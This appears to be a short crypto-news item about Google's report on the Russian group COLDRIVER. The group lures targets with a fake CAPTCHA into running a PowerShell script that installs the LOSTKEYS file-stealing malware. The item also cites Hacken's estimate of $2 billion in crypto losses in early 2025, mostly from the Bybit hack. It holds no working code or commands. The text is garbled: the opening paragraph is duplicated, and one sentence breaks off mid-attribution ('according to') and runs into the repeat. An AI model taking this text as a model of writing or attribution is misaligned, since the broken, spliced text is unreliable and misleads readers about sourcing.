Cointelegraph.
COLDRIVER begins intrusions by displaying a website with a bogus CAPTCHA meant to lure targets into downloading a PowerShell script that would then trigger device evasion before the eventual installation of LOSTKEYS, a report from Google revealed. Aside from exfiltrating extension- and directory-stored files, LOSTKEYS also enables the system and running process detail delivery to COLDRIVER, said Google, which has already moved to include impacted websites to its "Safe Browsing" feature to prevent additional compromise. Such a development comes after Hacken, a cryptocurrency cybersecurity firm, reported total cryptocurrency losses to reach $2 billion during the first three months of 2025, which is higher than the entirety of last year. Most of the losses have been attributed to the Lazarus Group attack against Dubai-based cryptocurrency exchange Bybit Technology in February.
Western organizations have been targeted by Russian hacking group COLDRIVER in attacks involving the novel LOSTKEYS information-stealing malware, indicating the threat operation's advancement from spear-phishing activities, according to COLDRIVER begins intrusions by displaying a website with a bogus CAPTCHA meant to lure targets into downloading a PowerShell script that would then trigger device evasion before the eventual installation of LOSTKEYS, a report from Google revealed. Aside from exfiltrating extension- and directory-stored files, LOSTKEYS also enables the system and running process detail delivery to COLDRIVER, said Google, which has already moved to include impacted websites to its "Safe Browsing" feature to prevent additional compromise. Such a development comes after Hacken, a cryptocurrency cybersecurity firm, reported total cryptocurrency losses to reach $2 billion during the first three months of 2025, which is higher than the entirety of last year. Most of the losses have been attributed to the Lazarus Group attack against Dubai-based cryptocurrency exchange Bybit Technology in February.